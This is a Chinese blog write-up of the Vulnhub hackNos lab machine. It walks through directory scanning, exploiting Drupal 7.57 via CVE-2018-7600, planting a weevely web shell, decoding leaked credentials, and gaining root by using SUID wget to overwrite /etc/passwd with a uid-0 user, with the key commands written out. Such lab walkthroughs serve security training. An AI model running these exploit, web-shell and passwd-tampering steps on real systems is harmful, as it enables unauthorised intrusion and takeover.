Vulbhub-hackNos

最新推荐文章于 2023-05-19 23:29:42 发布
最新推荐文章于 2023-05-19 23:29:42 发布
阅读量154 收藏
点赞数
分类专栏: Vulnhub靶机 文章标签: ssh 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62794597/article/details/129219327
版权

1、寻址靶机的IP

2、扫描靶机开放的端口

ssh-22   apache-80

3、访问web网站

这是apache说明文章,我们因此对其进行网站扫描

4、使用gobuster进行目录扫描‘’

gobuster dir -u http://192.168.0.109 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

 

我们可以发现有 drupal网站,我们进去访问

 可以发现是一个登录界面,从网页信息中可以获得一个用户james

我们在对drupal进行目录扫描

 

可以看到用户泄露,我们对admin进行解密得到其密码为admin 123

 我尝试在网页登录和ssh登录都无法登录成功

4、我们对其网站进行cms指纹识别

可以了解到drupal版本在7左右,通过drupal目录下有个文件CHANGELOG.txt

可以了解到drupal版本在7.57

 5、寻找drupal漏洞

可以在网上寻找到drupal7.57漏洞 ,GitHub - pimps/CVE-2018-7600: Exploit for Drupal 7 <= 7.57 CVE-2018-7600 找到exp

这个漏洞是可以进行远程命令执行漏洞

python drupa7-CVE-2018-7600.py http://192.168.0.109/drupal -c "ls"

因此我们可以进行上传马,我们使用蚁剑连接

首先在kali中开启apache服务

python3 -m http.server 8888

 

 

 蚁剑连接成功后,我们需要进行提权,首先在kali中监听端口,进行反弹shell

蚁剑连接后,我无法尝试反弹shell,在此我们了解到一个新工具weevely也可以进行反弹shell

──(root㉿wxs)-[~/anyue/hackNos]
└─# weevely generate 123 Nos.php

123连接密码,Nos.php文件,进行连接

┌──(root㉿wxs)-[~/anyue/hackNos/drupal]
└─# weevely http://192.168.0.109/drupal/Nos.php 123

 进行反弹shell后,我们进行查找信息

 找到一个base64文件,我们进行解密

 

 解密后还是一个加密是一个brainfuck加密,我们使用许愿星进行解密

 得到-james-Hacker@4514

 无法ssh登录,尝试网页登录

 网页登录但是没什么用,接着使用之前反弹shell进行提权

  

 可以看见有个wget 和 passwd 因此我们可以进行suid提权

看到了wget,以及passwd。接下来的思路就是先把靶机的passwd文件搞过来,在其中创建一个新用户,然后把新的passwd文件还回去即可在靶机上获取一个高权限用户

我们就可以给其复制到本地然后生成一个hash值添加进去

openssl passwd -l -salt 用户名 passwd

 生成密码后我们需要创建/etc/passwd然后让靶机下载

 那个0:0标记着root权限

最后我们进行切换用户

sxmmmmmmm
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
vulhub - SECARMY VILLAGE: GRAYHAT CONFERENCE writeup
Jiajiajiang_的博客
05-24 886
主机发现 && 端口扫描 netdiscover -i eth0 -r 192.168.154.1/24 端口扫描这次用的是threader3000 https://blog.csdn.net/Jiajiajiang_/article/details/117220625 好用 ------------------------------------------------------------ Threader 3000 - Multi-threaded.
Vulnhub-DC-2靶场渗透练习
weixin_52451257的博客
11-13 3603
Vulbhub-DC2 靶场地址:DC: 2 ~ VulnHub 根据提示 需要把靶机的IP和 域名绑定 修改hosts文件 Vi /etc/hosts 靶机ip dc-2 第一步:信息收集 nmap –sS 192.168.231.0/24 nmap -A -p- 192.168.231.140 扫描目录信息, 扫描目录目前掌握 dirb,nikto,dirmap,dirsearch dirb http://192.168.231.140 nikto -h htt...
Vulbhub-DomDom
wwxxss
02-27 153
我们使用php代码进行建立反弹shell,因为是post传参所以对其进行url编码。我们把/index.php/index.php 改为 /admin.php。这里可以使用脏牛提权,但是我这里用新的一种查看root目录的方式,根据网站提示这是一个登录用户的界面,我们接着扫描一下网站的目录。因为靶机就开了一个80端口,因此我们只能从这三个文件中找漏洞。我们可以看见/bin/tar这说明可以对文件进行读写。开放了80端口web服务,我们访问靶机的网站。在一顿瞎试的情况下,找到了一个命令执行漏洞。
VulbHub日记(七):Looz
Dawn_Xi的博客
09-13 259
靶机介绍 开始练习 本机ip:192.168.56.102 目的机ip:192.168.56.116 fping -aqg 192.168.56.0/24
VulbHub日记(十七):Momentum:2
Dawn_Xi的博客
11-28 2533
参考链接 Vulnhub:Momentum:2 参考博客1 参考博客2 开始练习 本机ip:192.168.56.102 目的机ip:192.168.56.139 fping -aqg 192.168.56.0/24 nmap 扫描主机 nap-A -v -p- 192.168.56.139 gobuster扫目录 gobuster dir -u http://192.168.56.139/ -x html,txt,php,bak --wordlist /usr/share/wordlists/di
VulnHub DC4
baynk的博客
05-18 339
0x00 靶机环境 下载地址1:https://www.vulnhub.com/entry/dc-4,313/ 下载地址2:https://pan.baidu.com/s/1VSecvfMlV7dN1-W7YlxrHg 提取码: tiwz 只有一个flag,但是给了多个切入点。 开肝。 0x01 渗透流程 nmap走起 服务端口继续扫 这次有两个端口存在,不可能ssh弱密码吧,还是先来80了。 只有这么一个登陆界面,试了SQL什么都没反应,sqlmap也一把梭过了,啥都没。通过页面的信息收集也找
Vulnhub靶机练习——Toppo
weixin_45126664的博客
08-05 964
这是一次靶场练习,使用 kali 和 Vulnhub 的Toppo靶机 ,难度属于新手入门 ! 靶机下载地址: 1、https://download.vulnhub.com/toppo/Toppo.zip 2、https://download.vulnhub.com/toppo/Toppo.zip.torrent 知识点: 1、netdiscover发现局域网内靶机IP地址 2、nmap扫描端口、服务、漏洞 3、dirb路径扫描 4、根据发现的端口(服务),尝试相应的探测和攻击 5、cewl搜集页面关
ISCC--实战第一阶段(记Drupal漏洞利用)
最新发布
qq_73767109的博客
05-19 380
或者进入pycharm中(如果是用pycharm的话)在里面搜索beautifulsoup4下载即可。使用最常见的cve-2018-7600漏洞。如果报错可以尝试进入python输入。输入ps -ef查看进程即可。按要求下载VPN连接后。用linux搜索相关漏洞。在网上搜索该漏洞的poc。把地址改成需要利用的地址。
教你怎么用Vulnhub来搭建环境
热门推荐
大方子
09-22 2万+
0x01 前言 Vulnhub它是一个提供各种漏洞环境的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。 如果只是练习一些常见的漏洞可以看我另外两篇用Docker来搭建各种漏洞靶场(妈妈再也不用担心我没有靶场练习了)从CentOS安装Docker来搭建漏洞靶场到Joomla 3.4.5 反序列化漏洞复现(附批量Getshell脚本) 0x02 下载 https:/...
Drupal远程代码执行漏洞(CVE-2018-7602)
weixin_46411728的博客
08-24 1414
CVE-2018-7602
Drupal 远程代码执行漏洞(CVE-2018-7602)
黑白的博客
12-28 3011
声明 好好学习,天天向上 漏洞描述 4月25日,Drupal官方发布通告,Drupal Core 存在一个远程代码执行漏洞,影响 7.x 和 8.x 版本。据分析,这个漏洞是CVE-2018-7600的绕过利用,两个漏洞原理是一样的,通告还称,已经发现了这个漏洞和CVE-2018-7600的在野利用 影响范围 Drupal 6.x,7.x,8.x 复现过程 这里使用7.57版本 使用vulhub /app/vulhub-master/drupal/CVE-2018-7602 使用docker启动 dock
漏洞复现-Drupal远程代码执行漏洞(CVE-2018-7602)
qq_45751902的博客
10-23 2054
的多个子系统中存在一个远程执行代码漏洞。这可能允许攻击者利用 Drupal 站点上的多个攻击媒介,从而导致该站点受到威胁。此漏洞与 Drupal 核心 - 高度关键 - 远程代码执行 - SA-CORE-2018-002 有关。SA-CORE-2018-002 和此漏洞都在野外被利用。-c 后面接命令,紧随账号,密码。
Drupal远程代码执行漏洞(CVE-2019-6339)
weixin_46411728的博客
08-25 2604
Drupal 远程代码执行漏洞(CVE-2019-6339)
Drupal 远程代码执行漏洞(CVE-2019-6339)
limb0的博客
07-04 9005
Drupal 远程代码执行漏洞(CVE-2019-6339) 一、漏洞介绍 Drupal core是Drupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。 Drupal core 7.62之前的7.x版本、8.6.6之前的8.6.x版本和8.5.9之前的8.5.x版本中的内置phar stream wrapper(PHP)存在远程代码执行漏洞。远程攻击者可利用该漏洞执行任意的php代码。 二、漏洞危害 远程代码执行。 三、漏洞验证 环境搭建: 实验环境 系统 IP地址 攻击
Vulnhub靶机渗透学习——DC-9
qq_45612828的博客
07-02 2989
Vulnhub靶机渗透学习——DC-9
Drupal 7.31版本最新漏洞利用个人完整总结,共享出来(附上利用源码)
kikaylee的专栏
10-23 8399
10月16日有国外安全研究人员在Twitter上曝出了Drupal 7.31版本的最新SQL注入漏洞,并给出了利用测试的EXP代码,小编在本地搭建Drupal7.31的环境,经过测试,发现该利用代码可成功执行并在数据库中增加一个攻击者自定义的用户。
Drupal 7.31SQL注入getshell漏洞利用详解及EXP
weixin_33759269的博客
11-25 1070
0x00 这个漏洞威力确实很大,而且Drupal用的也比较多,使用Fuzzing跑字典应该可以扫出很多漏洞主机,但是做批量可能会对对方网站造成很大的损失,所以我也就只是写个Exp不再深入下去。   0x01 关于漏洞的原理和POC在我的博客上已经有文章进行解释,这里只是着重说一下利用过程。配合POC的效果,我主要是从远程代码执行和GetShell方面去做的利用。 远程代码执行利用: 1...
drupal cve-2018-7600 远程代码执行漏洞 简介
whatday的专栏
06-13 1587
漏洞分析 Drupal 在 3 月 28 日爆出一个远程代码执行漏洞,CVE 编号 CVE-2018-7600,通过对比官方的补丁,可以得知是请求中存在 # 开头的参数。Drupal Render API 对于 # 有特殊处理,比如如下的数组: $form['choice_wrapper'] = array( '#tree' => FALSE, '#weight' => -4, '#prefix' => '<div class="clearfix" id="po
渗透利器Weevely之奇淫技巧篇
qk的专栏
10-26 5141
Weevely简介 Weevely是一款python编写的webshell管理工具,作为编写语言使用python的一款工具,它最大的优点就在于跨平台,可以在任何安装过python的系统上使用。本文介绍的不是它最基本的功能,而是在渗透测试过程中使用它的奇淫技巧。 安装运行 Linux:(python2.7版本的Debian/Ubuntu) $sudo apt-get install g++
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

sxmmmmmmm

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值